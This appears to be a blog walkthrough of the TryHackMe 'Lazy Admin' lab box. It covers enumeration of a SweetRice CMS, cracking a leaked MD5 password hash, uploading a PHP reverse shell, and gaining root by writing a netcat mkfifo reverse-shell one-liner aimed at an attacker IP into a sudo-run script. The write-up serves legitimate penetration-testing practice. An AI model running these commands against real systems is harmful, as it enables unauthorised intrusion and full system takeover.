THM — Lazy Admin
I'm back with another quick easy box from Try Hack me. This box is very straightforward. We enumerate what's presented. From there we find a login page where the credentials are found with proper enumeration. Once logged in we get a reverse shell. We can figure it out pretty quickly, if not one of the searchsploit exploits leads us to the path to get a shell. From there we will enumerate our shell which will present us with a simple technique to perform privilege escalation to gain root.
As always, we start our nmap scan.
We see that we have port 80 and 22 open. We know we don't have any creds for port 22 so let's move to port 80.
Once we’re on the website we see that it's an Apache default webserver. Let's look at the source code but see nothing is there.
Since there is nothing here lets begin enumerating. We will use dirb, gobuster, dirbuster, and nikto.
We see that we found the directory of /content so lets check it out.
We see that this is a CMS called SweetRice. Looking at the source code there is nothing else present. Lets keep this CMS in mind and continue to enumerate. We will do this by running dirb, gobuster against /content.
We see that we found some more directories so lets make sure that we look at each one.
We see that /images has no valuable information, neither does /js or /attachment.
Looking at /inc we found something interesting. A file called mysql_backup. Lets look at whats inside.
Within the file we download the file so we can look at whats inside. For now lets look at /as to mak sure nothing else is present.
/as is a login page for sweet rice so now we have found a way into the system. From here were either going to have to brute force the login page or find some creds.
Lets navigate back to the mysql_backup file we found and open it to see if we can find anything.
Within the code we can see where some keywords are present. We find manager, admin, and what appears to be a hash labeled as passwd.
Let's run that hash on hashid to see what type it is.
We see that this is either MD2 or MD5. We can crack this hash with cyber cheff, hashcat, or crackstation. Lets just use crackstation to do it quickly.
We find that the passwd is Password123. Lets use this password with manager or admin to see if we can login to the sweetrice login page located at /as.
We see that these creds worked, and it was manager:Password123
Now were in Sweetrice running version 1.5.1 We know we need to get a reverse shell to gain accesses. Lets run a searchsploit against it to see if we can find anything.
Lets look at the File upload and the Cross site Request Forgery /PHP code.
We see that the fileupload will allow us to upload a file. The PHP code allows us to manage an exploit in sweetrice. The exploit allows us to write code to the Ads tab that will store the file. We can use a php reverse shell to try to gain access.
I used pentestmoneky’s PHP reverse shell and added to the adds section.
We see that to trigger the shell we have to naviage to /content/inc/ads which we do see the file. Lets run or nc listner and click on the file to trigger the exploit.
We see that we have a shell on our nc listner.
Now we can navigate the directory where we find the user.txt file. This is located at /home/itguy
Lets also upgrade our shell: python -c ‘import pty;pty.spawn(“/bin/bash”)’
Now to perform privilege escalation: We do this by running our normal attempts of sudo -l. This will see if there is any commands that can be ran as sudo without a password.
Another route would be to host a python web server with linpeas and wget in our shell. We see that we didn't have to because we did find what commands we can run.
Let's look at backup.pl. We see that this is script that is calling /etc/copy.sh Lets now look at what /etc/copy.sh is to see what we can do.
We see that this is a reverse shell. Well, this makes it easy! Let's change the IP address and Port number to ours to catch the shell with netcat. We see that it's not as easy. VIM, Nano and gedit do not work.
This means we have to use echo or touch to change the data in the file. Let's use echo. We do this by running the following command.
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.9.69 4444 >/tmp/f” > /etc/copy.sh
This will allow us to change the info we can ensure it did by cating the file again. Lets run another nc linstner with the port we chose. Make sure its not a common port and one not in use.
Now to execute the file, we follow the what sudo -l stated.
We see this works properly because it did not prompt us for a password. Lets go back to our nc shell and see if it worked.
We see that it worked. We can now run id, or whoami to confirm that we are root.
Now cd to /root to get the root.txt file.
Congrats, you have now exploited this box all thanks to a lazyadmin configuration. Hopefully you were able to learn the importance of ENUMERATION! This will always be key to finding some type of information. We also learned how to get multiple shells to gain root access with some command line tricks to manipulate files to our need.
